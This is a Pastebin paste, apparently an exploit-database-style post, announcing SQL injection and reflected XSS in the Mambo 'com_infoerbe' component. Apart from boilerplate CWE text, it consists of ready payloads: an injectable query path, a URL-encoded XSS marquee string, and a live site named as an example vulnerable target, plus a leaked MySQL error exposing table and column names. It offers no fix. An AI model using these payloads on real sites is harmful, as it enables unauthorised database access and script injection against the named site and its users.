KingSkrupellos

Mambo Miro International Infoerbe XSS SQL Injection

Aug 23rd, 2019
95
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.99 KB | None | 0 0
  1. ###################################################################
  2.  
  3. # Exploit Title : Mambo Miro International Infoerbe XSS SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 24/08/2019
  7. # Vendor Homepage : infoerbe.it
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  12. Special Elements used in an SQL Command ('SQL Injection') ]
  13. CWE-79 [ Improper Neutralization of Input During
  14. Web Page Generation ('Cross-site Scripting') ]
  15. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  16. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  17. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  18.  
  19. ###################################################################
  20.  
  21. # Impact :
  22. ***********
  23. Mambo Miro International Infoerbe is prone to an SQL-injection
  24. vulnerability because it fails to sufficiently sanitize user-supplied data before using
  25. it in an SQL query. Exploiting this issue could allow an attacker to compromise the
  26. application, access or modify data, or exploit latent vulnerabilities in the underlying database.
  27. A remote attacker can send a specially crafted request to the vulnerable application and
  28. execute arbitrary SQL commands in application`s database. Further exploitation of this
  29. vulnerability may result in unauthorized data manipulation.
  30. An attacker can exploit this issue using a browser or with any SQL Injector Tool.
  31.  
  32. Reflected XSS (or Non-Persistent) :
  33. ***************************************
  34. The server reads data directly from the HTTP
  35. request and reflects it back in the HTTP response. Reflected XSS exploits occur when an
  36. attacker causes a victim to supply dangerous content to a vulnerable web application,
  37. which is then reflected back to the victim and executed by the web browser. The most common
  38. mechanism for delivering malicious content is to include it as a parameter in a URL that is
  39. posted publicly or e-mailed directly to the victim. URLs constructed in this manner constitute
  40. the core of many phishing schemes, whereby an attacker convinces a victim to visit a URL
  41. that refers to a vulnerable site. After the site reflects the attacker's content back to the victim,
  42. the content is executed by the victim's browser.
  43.  
  44. ###################################################################
  45.  
  46. # SQL Injection Exploit :
  47. **********************
  48. /index.php?option=com_infoerbe&task=res&qry=[SQL Injection]
  49.  
  50. # Cross Site Scripting XSS Exploit :
  51. ********************************
  52. /index.php?option=com_infoerbe&task=res&qry=1%27
  53. %3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EXSS-Vulnerability-
  54. Found-By-KingSkrupellos%3C/font%3E%3C/marquee%3E
  55.  
  56. ###################################################################
  57.  
  58. # Example Vulnerable Sites :
  59. *************************
  60. [+] infoerbe.it/index.php?option=com_infoerbe&task=res&qry=1%27
  61.  
  62. [+] infoerbe.it/index.php?option=com_infoerbe&task=res&qry=1%27
  63. %3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EXSS-Vulnerability-
  64. Found-By-KingSkrupellos%3C/font%3E%3C/marquee%3E
  65.  
  66. ###################################################################
  67.  
  68. # Example SQL Database Error :
  69. ****************************
  70. You have an error in your SQL syntax; check the manual that corresponds to your MySQL
  71. server version for the right syntax to use near '%' OR DTK_SIN_BOT.TITOLO LIKE
  72. '%1'%' OR DTK_SIN_BOT.TXT LIKE '%1'%' ' at line 6 SELECT DISTINCT NOME,
  73. DAT, 'SIN_BOT' AS FLD, INFOERBE.ID AS IDE FROM INFOERBE, DTK_SIN_BOT
  74. WHERE INFOERBE.ID=DTK_SIN_BOT.IDINFOERBE AND INFOERBE.ONLINE <>
  75. 0 AND (DTK_SIN_BOT.DAT LIKE '%1'%' OR DTK_SIN_BOT.TITOLO LIKE '%1'%'
  76. OR DTK_SIN_BOT.TXT LIKE '%1'%' OR DTK_SIN_BOT.KEYW LIKE '%1'%'
  77. OR DTK_SIN_BOT.EXT LIKE '%1'%' ) ORDER BY NOME, DAT
  78.  
  79. ###################################################################
  80.  
  81. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  82.  
  83. ###################################################################
Add Comment
Please, Sign In to add comment